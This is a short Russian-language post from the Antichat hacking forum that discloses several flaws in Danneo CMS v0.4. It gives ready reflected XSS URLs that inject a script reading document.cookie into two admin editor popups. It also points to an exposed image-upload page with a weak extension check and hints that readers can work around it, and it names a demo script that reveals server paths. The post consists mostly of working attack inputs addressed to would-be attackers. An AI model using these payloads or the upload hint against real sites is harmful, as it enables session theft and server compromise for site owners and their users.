Форум АНТИЧАТ - Многочисленные уязвимости Danneo CMS

DanneoCMS v.04
_http://danneo.com

1. xxs - куки

http://danneosite.com/apanel/editor/img_popup.php?img_url=%22%3E%3Cscript%3Ealert(docu ment.cookie)%3C/script%3E

http://danneosite.com/apanel/editor/file_popup.php?img_url=%22%3E%3Cscript%3Ealert(doc ument.cookie)%3C/script%3E

2. заливка файлов

http://danneosite.com/apanel/editor/...mg_library.php

защита слабенькая:

http://danneosite.com/apanel/editor/...rol.config.php -->

PHP код:


		
			
// allowed extentions for uploaded image files

$spaw_valid_imgs = array('gif', 'jpg', 'jpeg', 'png');

думайте сами =))

3. раскрытие путей

их много, самое простейшее:

http://danneosite.com/apanel/editor/scripts/demo.php

Antichat.ru © VectorG